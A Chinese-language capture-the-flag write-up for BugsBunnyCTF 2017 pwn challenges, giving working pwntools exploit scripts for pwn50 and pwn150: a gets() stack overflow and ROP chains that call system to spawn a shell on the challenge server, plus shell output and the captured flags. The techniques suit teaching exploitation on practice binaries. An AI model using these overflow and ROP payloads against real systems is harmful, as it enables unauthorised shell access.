BugsBunnyCTF2017-pwn-writeup

单刷好幸苦。

Pwn50

You look new here
so this is my gift for you
task : nc 54.153.19.139 5251
just write something when connect , its always UP
Author: TnMch

用了gets，有明显的溢出。题目中有提供了system函数执行。exp如下：

from pwn import *
r = remote("54.153.19.139","5251")

v6 = 0x62
v7 = 0x75
v8 = 0x67
v9 = 0xDEFACED
offset = 0x28 - 0x10
payload = 'bug' + 'a' * (offset -3)+ p64(v9)

r.sendline(payload)
r.interactive()

既然可以溢出，也可以用rop来做。exp如下：

from pwn import *
r = remote("54.153.19.139","5251")
elf = ELF("pwn50")
system_addr = elf.symbols['system']
binsh_addr = 0x0000000000400773
pop_rdi_ret_addr = 0x0000000000400743
offset = 56
payload = 'a' * offset
payload += p64(pop_rdi_ret_addr)
payload += p64(binsh_addr)
payload += p64(system_addr)

r.sendline(payload)
r.interactive()

然后我进去后找了好久的flag。以为那个pwn50是文件，结果最后发现是它是个文件夹mdzz。以后找flag可以用命令来帮忙：

$ find /  -name flag
find: '/root': Permission denied
/home/pwn50/flag
...

最后的flag：

Bugs_Bunny{lool_cool_stuf_even_its_old!!!!!}

Pwn100

Try this , maybe little hard
task : nc 54.153.19.139 5252
Author: TnMch

pwn150

用IDA调试后可以看到用fgets读入了192个字节，但起始位置距离rbp只有50个字节，存在溢出，而且程序没有开canary保护。溢出的offset推测为 0x50+8 = 88。

用gdb调试确定为88的偏移。由于程序中会fork出新进程，为调试方便可以在gdb调试开始时先输入set follow-fork-mode parent，然后在对应的地方下断点进行调试。

from pwn import *
elf = ELF('pwn150')
r = remote("54.153.19.139","5253")
print r.recvuntil("UTC 2017")
print r.recvuntil("Send me your message here:")
system_addr = elf.symbols['system']
sh_addr = elf.search('sh').next()
pop_rdi_ret_addr = 0x0000000000400883
pop_rsi_pop_r15_ret =  0x0000000000400881
offset = 88

payload = 'a' * offset
payload += p64(pop_rdi_ret_addr)
payload += p64(sh_addr)
payload += p64(system_addr)

r.send(payload)
r.interactive()

最后的flag：

$ ls
pwn150
$ cd pwn150
$ ls
flag
pwn150
$ cat flag
Bugs_Bunny{did_i_help_you_Solve_it!oHH_talk_to_hacker:D}

pwn300